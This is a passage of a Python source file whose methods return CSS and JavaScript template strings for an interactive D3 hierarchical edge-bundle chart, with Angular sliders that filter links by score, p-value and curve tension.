.node:hover,
.node--source,
.node--target {
stroke-opacity: 1.0;
font-weight: bold;
}
.node:hover,
.link--source,
.link--target {
stroke-opacity: 1.0;
font-weight: bold;
stroke-width: 4px;
}
.link {
stroke-opacity: 0.4;
fill: none;
}
.link--source {
stroke-opacity: 1.0;
font-weight: 800;
stroke-width: 4px;
}
.link--target {
stroke-opacity: 1.0;
}
#edgeBundlePanel {
position: relative;
width: 65%;
height: 65%;
margin: 0 auto;
margin-top: auto;
margin-bottom: auto;
margin-left: auto;
margin-right: auto;
}
#filterType {
display: $display_filter_type;
position: relative;
top: 0px;
left: 0px;
color: $foregroundColor;
}
#scoreSelect {
display: inline-block;
position: absolute;
top: $adj_score_top;
left: 5px;
color: $foregroundColor;
}
#abs_slider, #pos_slider, #neg_slider, #pvalue_slider, #tension_slider {
position: relative;
top: 45px;
}
#scoreSelect {
display: block;
}
#save {
position: relative;
top: 3em;
left: 0px;
color: $foregroundColor;
}
.abs_slider.rzslider .rz-bar {
background: #D3D3D3;
height: 2px;
}
.pos_slider.rzslider .rz-bar {
background: #D3D3D3;
height: 2px;
}
.neg_slider.rzslider .rz-bar {
background: #D3D3D3;
height: 2px;
}
.pvalue_slider.rzslider .rz-bar {
background: #D3D3D3;
height: 2px;
}
.tension_slider.rzslider .rz-bar {
background: #D3D3D3;
height: 2px;
}
.abs_slider.rzslider .rz-pointer {
width: 8px;
height: 20px;
top: auto; /* to remove the default positioning */
bottom: 0;
background-color: #333;
border-top-left-radius: 3px;
border-top-right-radius: 3px;
}
.pos_slider.rzslider .rz-pointer {
width: 8px;
height: 20px;
top: auto; /* to remove the default positioning */
bottom: 0;
background-color: #333;
border-top-left-radius: 3px;
border-top-right-radius: 3px;
}
.neg_slider.rzslider .rz-pointer {
width: 8px;
height: 20px;
top: auto; /* to remove the default positioning */
bottom: 0;
background-color: #333;
border-top-left-radius: 3px;
border-top-right-radius: 3px;
}
.pvalue_slider.rzslider .rz-pointer {
width: 8px;
height: 20px;
top: auto; /* to remove the default positioning */
bottom: 0;
background-color: #333;
border-top-left-radius: 3px;
border-top-right-radius: 3px;
}
.tension_slider.rzslider .rz-pointer {
width: 8px;
height: 20px;
top: auto; /* to remove the default positioning */
bottom: 0;
background-color: #333;
border-top-left-radius: 3px;
border-top-right-radius: 3px;
}
.abs_slider.rzslider .rz-pointer:after {
display: none;
}
.pos_slider.rzslider .rz-pointer:after {
display: none;
}
.neg_slider.rzslider .rz-pointer:after {
display: none;
}
.pvalue_slider.rzslider .rz-pointer:after {
display: none;
}
.tension_slider.rzslider .rz-pointer:after {
display: none;
}
h3, text {
font-family: sans-serif;
-webkit-touch-callout: none; /* iOS Safari */
-webkit-user-select: none; /* Safari */
-khtml-user-select: none; /* Konqueror HTML */
-moz-user-select: none; /* Firefox */
-ms-user-select: none; /* Internet Explorer/Edge */
user-select: none; /* Non-prefixed version, currently supported by Chrome and Opera */
}
td:nth-child(odd) {
background-color: #eee;
font-weight: bold;
}
'''
    return css_text
def __getJS(self):
js_text = '''
var flareData = $flareData
var pvalues = [];
var p_scores = [];
var n_scores = [];
var abs_scores = [];
var canvas = document.getElementById("edgeBundlePanel");
var edgeBundle = d3.select(canvas).append("svg").attr("id", "edgeBundle");
var redrawCount = 0;
var prevRedrawCount = 0;
var app = angular.module('rzSliderDemo', ['rzSlider']);
function redraw(){
if (redrawCount !== prevRedrawCount) {
setTimeout(function(){
window.location.reload();
});
window.location.reload();
}
prevRedrawCount = redrawCount;
redrawCount = redrawCount+1;
var diameter = canvas.clientWidth;
canvas.style.height = diameter;
var radius = diameter / 2;
var innerRadius = radius - $innerRadiusOffset;
var cluster = d3.cluster()
.separation(function(a, b) { return (a.parent == b.parent ? 1 : $blockSeparation ) })
.size([360, innerRadius]);
edgeBundle.selectAll("*").remove();
edgeBundle = d3.select("svg#edgeBundle")
.attr("width", diameter)
.attr("height", diameter)
.append("g")
.attr("transform", "translate(" + radius + "," + radius + ")")
.append("g");
var node = edgeBundle.selectAll(".node");
var link = edgeBundle.selectAll(".link");
var linkLine = updateBundle(flareData); //Initial generation of bundle to populate arrays
if ("$pmFlag" == "true") {
var currValues = {'max_abs_score': Number(d3.max(abs_scores))
, 'min_abs_score': 0
, 'min_p_score': 0
, 'max_p_score': Number(d3.max(p_scores))
, 'min_n_score': Number(d3.min(n_scores))
, 'max_n_score': 0
, 'min_pvalue': 0
, 'max_pvalue': 1
, 'tension': 0.85};
} else {
var currValues = {'max_abs_score': Number(d3.max(abs_scores))
, 'min_abs_score': 0
, 'min_p_score': 0
, 'max_p_score': Number(d3.max(p_scores))
, 'min_n_score': Number(d3.min(n_scores))
, 'max_n_score': 0
, 'tension': 0.85};
}
String.prototype.trimLeft = function(charlist) {
if (charlist === undefined)
charlist = "\s";
return this.replace(new RegExp("^[" + charlist + "]+"), "");
};
Number.prototype.countDecimals = function () {
if(Math.floor(this.valueOf()) === this.valueOf()) return 0;
var value = 0;
var check = this.toString().includes("e-");
if (check) {
var value = this.toString().split("-")[1];
} else {
var value1 = this.toString().split(".")[1];
var value2 = value1.trimLeft("0");
var value = value1.length - value2.length + 1;
}
return value
}
app.controller('MainCtrl', function ($$scope, $$timeout) {
$$scope.pos_visible = false;
$$scope.neg_visible = false;
$$scope.abs_visible = true;
$$scope.pvalue_visible = false;
$$scope.pos_toggle = function () {
if (!$$scope.pos_visible){
$$scope.pos_visible = !$$scope.pos_visible;
$$scope.abs_visible = false;
$$scope.neg_visible = false;
$$scope.pvalue_visible = false;
$$timeout(function () {
$$scope.$$broadcast('rzSliderForceRender');
});
}
};
$$scope.neg_toggle = function () {
if (!$$scope.neg_visible){
$$scope.neg_visible = !$$scope.neg_visible;
$$scope.pos_visible = false;
$$scope.abs_visible = false;
$$scope.pvalue_visible = false;
$$timeout(function () {
$$scope.$$broadcast('rzSliderForceRender');
});
}
};
$$scope.abs_toggle = function () {
if (!$$scope.abs_visible){
$$scope.abs_visible = !$$scope.abs_visible;
$$scope.pos_visible = false;
$$scope.neg_visible = false;
$$scope.pvalue_visible = false;
$$timeout(function () {
$$scope.$$broadcast('rzSliderForceRender');
});
}
};
$$scope.pvalue_toggle = function () {
if ("$pmFlag" == "true") {
if (!$$scope.pvalue_visible){
$$scope.pvalue_visible = !$$scope.pvalue_visible;
$$scope.pos_visible = false;
$$scope.neg_visible = false;
$$scope.abs_visible = false;
}
} else {
$$scope.pvalue_visible = false;
$$scope.pos_visible = true;
$$scope.neg_visible = true;
$$scope.abs_visible = true;
}
$$timeout(function () {
$$scope.$$broadcast('rzSliderForceRender');
});
};
$$scope.score_toggle = function () {
if ("$pmFlag" == "true") {
$$scope.pvalue_visible = !$$scope.pvalue_visible;
} else {
$$scope.pvalue_visible = false;
}
var form = document.getElementById("scoreSelect")
var form_val;
for(var i=0; i<form.length; i++) {
if(form[i].checked){
form_val = form[i].id;
}
}
if (form_val == "PosScoreRadio") {
$$scope.pos_visible = true;
} else if (form_val == "NegScoreRadio") {
$$scope.neg_visible = true;
} else if (form_val == "AbsScoreRadio") {
$$scope.abs_visible = true;
}
$$timeout(function () {
$$scope.$$broadcast('rzSliderForceRender');
});
};
var sliderScoreDecimalPlaces = 6;
$$scope.abs_slider = {
minValue: Number(d3.min(abs_scores).toFixed(sliderScoreDecimalPlaces)),
maxValue: Number(d3.max(abs_scores).toFixed(sliderScoreDecimalPlaces)),
options: {
showSelectionBar: true,
floor: Number(d3.min(abs_scores).toFixed(sliderScoreDecimalPlaces)),
ceil: Number(d3.max(abs_scores).toFixed(sliderScoreDecimalPlaces)),
step: Number(1/Math.pow(10, sliderScoreDecimalPlaces)),
precision: sliderScoreDecimalPlaces,
getSelectionBarColor: function() { return '#2AE02A'; },
getPointerColor: function() { return '#D3D3D3'; },
pointerSize: 1,
onChange: function () {
var absScoreMinValue = $$scope.abs_slider.minValue
var absScoreMaxValue = $$scope.abs_slider.maxValue
var tension = currValues.tension;
currValues['min_abs_score'] = absScoreMinValue;
currValues['max_abs_score'] = absScoreMaxValue;
//Filter all links out and update links
var FlareData = filterData(Number(d3.max(abs_scores))*10, Number(d3.max(abs_scores))*10, 'score_abs');
var linkLine = updateBundle(FlareData);
var line = linkLine.line;
var link = linkLine.link;
line.curve(d3.curveBundle.beta(tension));
link.attr('d', d => line(d.source.path(d.target)));
//Apply new filter and update links
var FlareData = filterData(absScoreMinValue, absScoreMaxValue, 'score_abs');
var linkLine = updateBundle(FlareData);
var line = linkLine.line;
var link = linkLine.link;
line.curve(d3.curveBundle.beta(tension));
link.attr('d', d => line(d.source.path(d.target)));
}
}
};
if (p_scores.length != 0) {
$$scope.pos_slider = {
minValue: Number(d3.min(p_scores).toFixed(sliderScoreDecimalPlaces)),
maxValue: Number(d3.max(p_scores).toFixed(sliderScoreDecimalPlaces)),
options: {
showSelectionBar: true,
floor: Number(d3.min(p_scores).toFixed(sliderScoreDecimalPlaces)),
ceil: Number(d3.max(p_scores).toFixed(sliderScoreDecimalPlaces)),
step: Number(1/Math.pow(10, sliderScoreDecimalPlaces)),
precision: sliderScoreDecimalPlaces,
getSelectionBarColor: function() { return '#2AE02A'; },
getPointerColor: function() { return '#D3D3D3'; },
pointerSize: 1,
onChange: function () {
var pScoreMinValue = $$scope.pos_slider.minValue
var pScoreMaxValue = $$scope.pos_slider.maxValue
var tension = currValues.tension;
currValues['min_p_score'] = pScoreMinValue;
currValues['max_p_score'] = pScoreMaxValue;
//Filter all links out and update links
var FlareData = filterData(Number(d3.max(p_scores))*10, Number(d3.max(p_scores))*10, 'score_pos');
var linkLine = updateBundle(FlareData);
var line = linkLine.line;
var link = linkLine.link;
line.curve(d3.curveBundle.beta(tension));
link.attr('d', d => line(d.source.path(d.target)));
//Apply new filter and update links
var FlareData = filterData(pScoreMinValue, pScoreMaxValue, 'score_pos');
var linkLine = updateBundle(FlareData);
var line = linkLine.line;
var link = linkLine.link;
line.curve(d3.curveBundle.beta(tension));
link.attr('d', d => line(d.source.path(d.target)));
}
}
};
}
if (n_scores.length != 0) {
$$scope.neg_slider = {
minValue: Number(d3.min(n_scores).toFixed(sliderScoreDecimalPlaces)),
maxValue: Number(d3.max(n_scores).toFixed(sliderScoreDecimalPlaces)),
options: {
showSelectionBar: true,
floor: Number(d3.min(n_scores).toFixed(sliderScoreDecimalPlaces)),
ceil: Number(d3.max(n_scores).toFixed(sliderScoreDecimalPlaces)),
step: Number(1/Math.pow(10, sliderScoreDecimalPlaces)),
precision: sliderScoreDecimalPlaces,
getSelectionBarColor: function() { return '#2AE02A'; },
getPointerColor: function() { return '#D3D3D3'; },
pointerSize: 1,
onChange: function () {
var nScoreMinValue = $$scope.neg_slider.minValue
var nScoreMaxValue = $$scope.neg_slider.maxValue
var tension = currValues.tension;
currValues['min_n_score'] = nScoreMinValue;
currValues['max_n_score'] = nScoreMaxValue;
//Filter all links out and update links
var FlareData = filterData(Number(d3.min(n_scores))*10, Number(d3.min(n_scores))*10, 'score_neg');
var linkLine = updateBundle(FlareData);
var line = linkLine.line;
var link = linkLine.link;
line.curve(d3.curveBundle.beta(tension));
link.attr('d', d => line(d.source.path(d.target)));
//Apply new filter and update links
var FlareData = filterData(nScoreMinValue, nScoreMaxValue, 'score_neg');
var linkLine = updateBundle(FlareData);
var line = linkLine.line;
var link = linkLine.link;
line.curve(d3.curveBundle.beta(tension));
link.attr('d', d => line(d.source.path(d.target)));
}
}
};
}
if ("$pmFlag" == "true") {
if (pvalues.length != 0) {
$$scope.pvalue_slider = {
minValue: Number(d3.min(pvalues).toFixed(Number(d3.min(pvalues).countDecimals()))),
maxValue: Number(d3.max(pvalues).toFixed(Number(d3.min(pvalues).countDecimals()))),
options: {
showSelectionBar: true,
floor: Number(d3.min(pvalues).toFixed(Number(d3.min(pvalues).countDecimals()))),
ceil: Number(d3.max(pvalues).toFixed(Number(d3.min(pvalues).countDecimals()))),
step: Number(d3.min(pvalues).toFixed(Number(d3.min(pvalues)).countDecimals())),
logScale: true,
precision: Number(d3.min(pvalues).countDecimals()),
getSelectionBarColor: function() { return '#2AE02A'; },
getPointerColor: function() { return '#D3D3D3'; },
pointerSize: 1,
onChange: function () {
var pvalueMinValue = $$scope.pvalue_slider.minValue;
var pvalueMaxValue = $$scope.pvalue_slider.maxValue;
var tension = currValues.tension;
currValues['min_pvalue'] = pvalueMinValue;
currValues['max_pvalue'] = pvalueMaxValue;
//Filter all links out and update links
var FlareData = filterData(Number(d3.min(pvalues))/10, Number(d3.min(pvalues))/10, 'pvalue');
var linkLine = updateBundle(FlareData);
var line = linkLine.line;
var link = linkLine.link;
line.curve(d3.curveBundle.beta(tension));
link.attr("d", d => line(d.source.path(d.target)));
//Apply new filter and update links
var FlareData = filterData(pvalueMinValue, pvalueMaxValue, 'pvalue');
var linkLine = updateBundle(FlareData);
var line = linkLine.line;
var link = linkLine.link;
line.curve(d3.curveBundle.beta(tension));
link.attr("d", d => line(d.source.path(d.target)));
}
}
};
}
}
$$scope.tension_slider = {
value: Number(0.85),
options: {
showSelectionBar: true,
floor: Number(0.0),
ceil: Number(1.0),
step: 0.05,
precision: 4,
getSelectionBarColor: function() { return '#2AE02A'; },
getPointerColor: function() { return '#D3D3D3'; },
pointerSize: 1,
onChange: function () {
var tension = $$scope.tension_slider.value
currValues['tension'] = tension;
var form = document.getElementById("filterType")
var form_val;
for(var i=0; i<form.length; i++) {
if(form[i].checked) {
form_val = form[i].id;
}
}
if (form_val == "scoreRadio") {
var score_form = document.getElementById("scoreSelect")
var score_form_val;
for(var i=0; i<score_form.length; i++){
if(score_form[i].checked){
score_form_val = score_form[i].id;
}
}
if (score_form_val == "PosScoreRadio") {
var min_p_scoreValue = currValues.min_p_score;
var max_p_scoreValue = currValues.max_p_score;
var FlareData = filterData(min_p_scoreValue, max_p_scoreValue, 'score_pos');
} else if (score_form_val == "NegScoreRadio") {
var min_n_scoreValue = currValues.min_n_score;
var max_n_scoreValue = currValues.max_n_score;
var FlareData = filterData(min_n_scoreValue, max_n_scoreValue, 'score_neg');
} else if (score_form_val == "AbsScoreRadio") {
var min_abs_scoreValue = currValues.min_abs_score;
var max_abs_scoreValue = currValues.max_abs_score;
var FlareData = filterData(min_abs_scoreValue, max_abs_scoreValue, 'score_abs');
}
} else {
if ("$pmFlag" == "true") {
if (form_val == "pvalueRadio") {
var pvalueMinValue = currValues.min_pvalue;
var pvalueMaxValue = currValues.max_pvalue;
var FlareData = filterData(pvalueMinValue, pvalueMaxValue, 'pvalue');
}
}
}
var linkLine = updateBundle(FlareData);
var line = linkLine.line;
var link = linkLine.link;
line.curve(d3.curveBundle.beta(tension));
link.attr("d", d => line(d.source.path(d.target)));
}
}
};
$$scope.savebutton = function () {
var options = {
canvg: window.canvg,
backgroundColor: '$backgroundColor',
height: diameter+100,
width: diameter+100,
left: -50,
top: -50,
scale: 5/window.devicePixelRatio,
encoderOptions: 1,
ignoreMouse : true,
ignoreAnimation : true,
}
saveSvgAsPng(d3.select('svg#edgeBundle').node(), "edgeBundle.png", options);
}
});
function changeFilter() {
var form = document.getElementById("filterType")
var form_val;
for(var i=0; i<form.length; i++){
if(form[i].checked){
form_val = form[i].id;
}
}
if (form_val == "scoreRadio") {
d3.select('#scoreSelect').style("display", 'block');
var form_score = document.getElementById("scoreSelect")
var form_val_score;
for(var i=0; i<form_score.length; i++){
if(form_score[i].checked){
form_val_score = form_score[i].id;
}
}
if (form_val_score == "PosScoreRadio") {
//Filter out all links prior to updating with the score threshold
var FlareData = filterData(Number(d3.max(p_scores))*10, Number(d3.max(p_scores))*10, 'score_pos');
var linkLine = updateBundle(FlareData);
//Filter with the new score threshold
var FlareData = filterData(currValues.min_p_score, currValues.max_p_score, 'score_pos');
var linkLine = updateBundle(FlareData);
} else if (form_val_score == "NegScoreRadio") {
//Filter out all links prior to updating with the score threshold
var FlareData = filterData(Number(d3.min(n_scores))*10, Number(d3.min(n_scores))*10, 'score_neg');
var linkLine = updateBundle(FlareData);
//Filter with the new score threshold
var FlareData = filterData(currValues.min_n_score, currValues.max_n_score, 'score_neg');
var linkLine = updateBundle(FlareData);
} else if (form_val_score == "AbsScoreRadio") {
//Filter out all links prior to updating with the score threshold
var FlareData = filterData(Number(d3.max(abs_scores))*10, Number(d3.max(abs_scores))*10, 'score_abs');
var linkLine = updateBundle(FlareData);
//Filter with the new score threshold
var FlareData = filterData(currValues.min_abs_score, currValues.max_abs_score, 'score_abs');
var linkLine = updateBundle(FlareData);
}
} else {
if ("$pmFlag" == "true") {
if (form_val == "pvalueRadio") {
d3.select('#scoreSelect').style("display", 'none');
//Filter out all links prior to updating with the pvalue threshold
var FlareData = filterData(Number(d3.min(pvalues))/10, Number(d3.min(pvalues))/10, 'pvalue');
var linkLine = updateBundle(FlareData);
//Filter with the new pvalue threshold
var FlareData = filterData(currValues.min_pvalue, currValues.max_pvalue, 'pvalue');
var linkLine = updateBundle(FlareData);
}
} else {
d3.select('#scoreSelect').style("display", 'block');
}
}
var tension = currValues.tension;
var line = linkLine.line;
var link = linkLine.link;
line.curve(d3.curveBundle.beta(tension));
link.attr("d", d => line(d.source.path(d.target)));
}
function changeScore() {
var form = document.getElementById("scoreSelect")
var form_val;
for(var i=0; i<form.length; i++) {
if(form[i].checked){
form_val = form[i].id;
}
}
if (form_val == "PosScoreRadio") {
//Filter out all links prior to updating with the score threshold
var FlareData = filterData(Number(d3.max(p_scores))*10, Number(d3.max(p_scores))*10, 'score_pos');
var linkLine = updateBundle(FlareData);
var FlareData = filterData(currValues.min_p_score, currValues.max_p_score, 'score_pos');
var linkLine = updateBundle(FlareData);
} else if (form_val == "NegScoreRadio") {
//Filter out all links prior to updating with the score threshold
var FlareData = filterData(Number(d3.min(n_scores))*10, Number(d3.min(n_scores))*10, 'score_neg');
var linkLine = updateBundle(FlareData);
var FlareData = filterData(currValues.min_n_score, currValues.max_n_score, 'score_neg');
var linkLine = updateBundle(FlareData);
} else if (form_val == "AbsScoreRadio") {
//Filter out all links prior to updating with the score threshold
var FlareData = filterData(Number(d3.max(abs_scores))*10, Number(d3.max(abs_scores))*10, 'score_abs');
var linkLine = updateBundle(FlareData);
var FlareData = filterData(currValues.min_abs_score, currValues.max_abs_score, 'score_abs');
var linkLine = updateBundle(FlareData);
}
var tension = currValues.tension;
var line = linkLine.line;
var link = linkLine.link;
line.curve(d3.curveBundle.beta(tension));
link.attr("d", d => line(d.source.path(d.target)));
}
if ("$pmFlag" == "true") {
var filterDim = d3.select("#filterType");
filterDim.on("change", changeFilter);
}
var selectDim = d3.select("#scoreSelect");
selectDim.on("change", changeScore);
// Rebuild the hierarchical edge bundle from `data` (a flare-style list of
// nodes, each carrying an `imports` map of links). Mutates the shared
// pvalues/p_scores/n_scores/abs_scores arrays and the enclosing
// node/link selections, then returns {line, link} so callers can
// re-tension the curves.
function updateBundle(data) {
// Reset the shared statistic accumulators before re-reading the links.
pvalues = []
p_scores = []
n_scores = []
abs_scores = []
var line = d3.radialLine()
.curve(d3.curveBundle.beta(0.85))
.radius(function(d) { return d.y; })
.angle(function(d) { return d.x / 180 * Math.PI; });
var root = d3.hierarchy(packageHierarchy(data), (d) => d.children);
cluster(root)
var nodes = root.descendants();
node = node.data(nodes.filter(function(n) { return !n.children; }));
node.exit().remove();
// Scale the configured font size relative to the canvas width.
function getFont() {
var fontBase = 1000;
var fontSize = $fontSize;
var ratio = fontSize / fontBase;
var width = canvas.clientWidth;
var size = width * ratio;
return (size|0) + 'px';
}
// Scale the configured arc radius offset relative to the canvas width.
function getArcRadiusOffset() {
var arcBase = 1157;
var arcRatio = $arcRadiusOffset / arcBase;
var arcWidth = canvas.clientWidth;
var arcRadOffset = arcWidth * arcRatio;
return (arcRadOffset|0);
}
//Test to see if there are multiple blocks in the data. If none then set addArcs to false
var blocks = []
nodes.forEach(function(n) { if (n.data.Block !== undefined) { blocks.push(n.data.Block) }});
if ("$addArcs" == "true") {
var addArcs = true;
if (blocks.length == 0) {
addArcs = false;
}
} else {
var addArcs = false;
}
if (addArcs == true) {
// Group the leaf nodes by Block and draw one labelled arc per block.
var groupDict = {}
var adjArcRadiusOffset = getArcRadiusOffset();
var arcTextPositionOffset = 0.75 * adjArcRadiusOffset;
var arcRadius = innerRadius + adjArcRadiusOffset;
var arcGap = adjArcRadiusOffset + 5;
nodes.forEach(function(n) {
if (n.data.Block !== undefined) {
if (groupDict[n.data.Block] === undefined) {
groupDict[n.data.Block] = []
groupDict[n.data.Block].push(n)
} else {
groupDict[n.data.Block].push(n)
}
}
})
// One representative node per block; its parent supplies the angle span.
var groups = []
for (var [key, value] of Object.entries(groupDict)) {
groups.push(value[0])
}
edgeBundle.selectAll("g.group").remove();
// NOTE(review): append("group") creates a non-standard <group> element
// (probably meant "g"); the elements are only used below as carriers of
// bound data, so rendering is unaffected - confirm before changing.
var groupData = edgeBundle.selectAll("g.group")
.data(groups)
.enter().append("group")
.attr("class", "group");
var groupArc = d3.arc()
.innerRadius(innerRadius)
.outerRadius(arcRadius)
.startAngle(function(d) { return (findStartAngle(d.__data__.parent.children)-$extendArcAngle) * Math.PI / 180;})
.endAngle(function(d) { return (findEndAngle(d.__data__.parent.children)+$extendArcAngle) * Math.PI / 180});
edgeBundle.selectAll("g.arc").remove();
edgeBundle.selectAll("g.arc")
.data(groupData._groups[0])
.enter()
.append("svg:path")
.attr("d", groupArc)
.attr("class", "groupArc")
.attr("fill", function(d) { return d.__data__.data.block_color; })
.style("fill-opacity", 1.0)
.attr("id", function(d,i) { return "arc_"+i; });
edgeBundle.selectAll(".arcText").remove();
edgeBundle.selectAll(".arcText")
.data(groupData._groups[0])
.enter()
.append("text")
.attr("class", "arcText")
.attr("x", 5) //Move text from the start angle of the arc
.attr("dy", arcTextPositionOffset) //Move the text down
.append("textPath")
.attr("xlink:href",function(d,i){return "#arc_"+i;})
.style("font-size", getFont())
.text(function(d){return d.__data__.data.Block;});
} else {
var arcGap = 5;
}
// Draw the leaf labels; highlighting is wired to hover or to
// click/double-click depending on the mouseOver template flag.
if ("$mouseOver" == "true") {
var newNode = node.enter().append("text")
.attr("class", "node")
.attr("dy", ".31em")
.attr("transform", function(d) { return "rotate(" + (d.x - 90) + ")translate(" + (d.y + arcGap) + ",0)" + (d.x < 180 ? "" : "rotate(180)"); })
.style("text-anchor", function(d) { return d.x < 180 ? "start" : "end"; })
.text(function(d) { return d.data.Label; })
.style("font-size", getFont())
.style("fill", function(d) { return d.data.node_color; })
.on("mouseover", mouseovered)
.on("mouseout", mouseouted);
} else {
var newNode = node.enter().append("text")
.attr("class", "node")
.attr("dy", ".31em")
.attr("transform", function(d) { return "rotate(" + (d.x - 90) + ")translate(" + (d.y + arcGap) + ",0)" + (d.x < 180 ? "" : "rotate(180)"); })
.style("text-anchor", function(d) { return d.x < 180 ? "start" : "end"; })
.text(function(d) { return d.data.Label; })
.style("font-size", getFont())
.style("fill", function(d) { return d.data.node_color; })
.on("click", mouseovered)
.on("dblclick", mouseouted);
}
node = node.merge(newNode);
// Decorate each link with its colour/score (plus p-value when available)
// and refill the shared statistic arrays.
var links = packageImports(root.descendants());
if ("$pmFlag" == "true") {
links = links.map(d=> ({ ...d
, link_color: d.source.data.imports[d.target.data.id]["link_color"]
, link_score: d.source.data.imports[d.target.data.id]["link_score"]
, link_pvalue : d.source.data.imports[d.target.data.id]["link_pvalue"]}));
links.forEach(function(d) { abs_scores.push(Math.abs(d.link_score))
, pvalues.push(d.link_pvalue);
if (d.link_score >= 0) {
p_scores.push(d.link_score);
} else {
n_scores.push(d.link_score);
}
});
} else {
links = links.map(d=> ({ ...d
, link_color: d.source.data.imports[d.target.data.id]["link_color"]
, link_score: d.source.data.imports[d.target.data.id]["link_score"]}));
links.forEach(function(d) { abs_scores.push(Math.abs(d.link_score));
if (d.link_score >= 0) {
p_scores.push(d.link_score);
} else {
n_scores.push(d.link_score);
}
});
}
link = link.data(links);
link.exit().remove();
var newLink = link.enter().append("path")
.attr("class", "link")
.attr('d', d => line(d.source.path(d.target)))
.style("stroke", function(d) { return d.link_color; });
link = link.merge(newLink);
var linkLine = {"line": line, "link": link}
// Smallest x (angle in degrees) among the given siblings.
function findStartAngle(children) {
var min = children[0].x;
children.forEach(function(d) {
if (d.x < min) {
min = d.x;
}
});
return min;
}
// Largest x (angle in degrees) among the given siblings.
function findEndAngle(children) {
var max = children[0].x;
children.forEach(function(d) {
if (d.x > max) {
max = d.x;
}
});
return max;
}
// Highlight the hovered node and its incident links; fade everything else.
function mouseovered(d) {
node
.each(function(n) { n.target = n.source = false; });
link
.classed("link--target", function(l) { if (l.target === d) return l.source.source = true; })
.classed("link--source", function(l) { if (l.source === d) return l.target.target = true; })
.filter(function(l) { return l.target === d || l.source === d; })
.each(function() { this.parentNode.appendChild(this); })
node
.classed("node--both", function(n) { return n.source && n.target; })
.classed("node--target", function(n) { return n.target; })
.classed("node--source", function(n) { return n.source; });
link.style('opacity', o => (o.source === d || o.target === d ? 1 : $linkFadeOpacity))
}
// Clear all hover highlighting and restore full opacity.
function mouseouted(d) {
link
.classed("link--target", false)
.classed("link--source", false);
node
.classed("node--both", false)
.classed("node--target", false)
.classed("node--source", false);
link.style('opacity', 1);
node.style('opacity', 1);
}
// Build the node hierarchy from "#"-delimited ids; returns the root
// (the entry whose id is the empty string).
function packageHierarchy(classes) {
var map = {};
function find(id, data) {
var node = map[id], i;
if (!node) {
node = map[id] = data || {id: id, children: []};
if (id.length) {
node.parent = find(id.substring(0, i = id.lastIndexOf("#")));
node.parent.children.push(node);
node.key = id.substring(i + 1);
}
}
return node;
}
classes.forEach(function(d) {
find(d.id, d);
});
return map[""];
}
// Convert every entry of each node's `imports` map into a
// {source, target} pair of hierarchy nodes.
function packageImports(nodes) {
var map = {}, imports = [];
nodes.forEach(function(d) {
map[d.data.id] = d;
});
nodes.forEach(function(d) {
if (d.data.imports) Object.keys(d.data.imports).forEach(function(i) {
imports.push({source: map[d.data.id], target: map[i]});
});
});
return imports;
}
return linkLine;
}
// Return a copy of flareData in which every flare's `imports` map keeps
// only the links whose statistic lies inside [minThreshold, maxThreshold].
// `filtType` selects the statistic: 'score_abs' (absolute score),
// 'score_pos' / 'score_neg' (signed score), or 'pvalue' (only meaningful
// when the template's pmFlag renders as "true"). Any other filtType
// removes every link.
function filterData(minThreshold, maxThreshold, filtType) {
// Shallow-copy each flare so reassigning `imports` below leaves the
// original flareData entries untouched.
const data = flareData.map(a => ({...a}));
var FlareData = []
for (var i = 0; i < data.length; i++) {
var flare = data[i];
var newLinks = {}
for (const [key, value] of Object.entries(flare.imports)) {
var link_score = value["link_score"];
var link_color = value["link_color"];
var link_pvalue;
if ("$pmFlag" == "true") {
link_pvalue = value["link_pvalue"];
}
// Decide once whether this link survives the threshold window.
var keep = false;
if (filtType == 'score_abs') {
keep = (Math.abs(link_score) >= minThreshold) && (Math.abs(link_score) <= maxThreshold);
} else if (filtType == 'score_neg') {
keep = (link_score <= maxThreshold) && (link_score >= minThreshold);
} else if (filtType == 'score_pos') {
keep = (link_score >= minThreshold) && (link_score <= maxThreshold);
} else if (filtType == 'pvalue') {
if ("$pmFlag" == "true") {
keep = (link_pvalue >= minThreshold) && (link_pvalue <= maxThreshold);
}
}
if (keep) {
if ("$pmFlag" == "true") {
newLinks[key] = {"link_score": link_score
, "link_pvalue": link_pvalue
, "link_color": link_color};
} else {
newLinks[key] = {"link_score": link_score
, "link_color": link_color};
}
}
}
flare.imports = newLinks;
FlareData.push(flare)
}
return FlareData;
}
}
// Initial draw, then redraw whenever the window is resized.
redraw();
window.addEventListener("resize", redraw);
'''
return js_text
def __getJSdashboard(self):
js_text = '''
// Flare-style node/link data injected by the Python template.
var flareData = $flareData
// Per-link statistics; refilled on every updateBundle() call.
var pvalues = [];
var p_scores = [];
var n_scores = [];
var abs_scores = [];
// SVG container for the edge bundle plus the Angular slider app.
var canvas = document.getElementById("edgeBundlePanel");
var edgeBundle = d3.select(canvas).append("svg").attr("id", "edgeBundle");
// Guard counters: any redraw after the first reloads the page (see redraw()).
var redrawCount = 0;
var prevRedrawCount = 0;
var app = angular.module('rzSliderDemo', ['rzSlider']);
function redraw(){
// Any redraw after the first reloads the page so the Angular sliders and
// the bundle are rebuilt from scratch.
if (redrawCount !== prevRedrawCount) {
setTimeout(function(){
window.location.reload();
});
window.location.reload();
}
prevRedrawCount = redrawCount;
redrawCount = redrawCount+1;
// Size the drawing to the panel and derive the cluster layout radii.
var diameter = canvas.clientWidth;
// NOTE(review): assigning a bare number to style.height has no unit and
// is ignored by browsers - confirm whether "px" should be appended.
canvas.style.height = diameter;
var radius = diameter / 2;
var innerRadius = radius - $innerRadiusOffset;
var cluster = d3.cluster()
.separation(function(a, b) { return (a.parent == b.parent ? 1 : $blockSeparation ) })
.size([360, innerRadius]);
// Rebuild the root <g>, translated to the centre of the SVG.
edgeBundle.selectAll("*").remove();
edgeBundle = d3.select("svg#edgeBundle")
.attr("width", diameter)
.attr("height", diameter)
.append("g")
.attr("transform", "translate(" + radius + "," + radius + ")")
.append("g");
var node = edgeBundle.selectAll(".node");
var link = edgeBundle.selectAll(".link");
var linkLine = updateBundle(flareData); //Initial generation of bundle to populate arrays
// Remember the active thresholds; the p-value bounds exist only when the
// template's pmFlag renders as "true".
if ("$pmFlag" == "true") {
var currValues = {'max_abs_score': Number(d3.max(abs_scores))
, 'min_abs_score': 0
, 'min_p_score': 0
, 'max_p_score': Number(d3.max(p_scores))
, 'min_n_score': Number(d3.min(n_scores))
, 'max_n_score': 0
, 'min_pvalue': 0
, 'max_pvalue': 1
, 'tension': 0.85};
} else {
var currValues = {'max_abs_score': Number(d3.max(abs_scores))
, 'min_abs_score': 0
, 'min_p_score': 0
, 'max_p_score': Number(d3.max(p_scores))
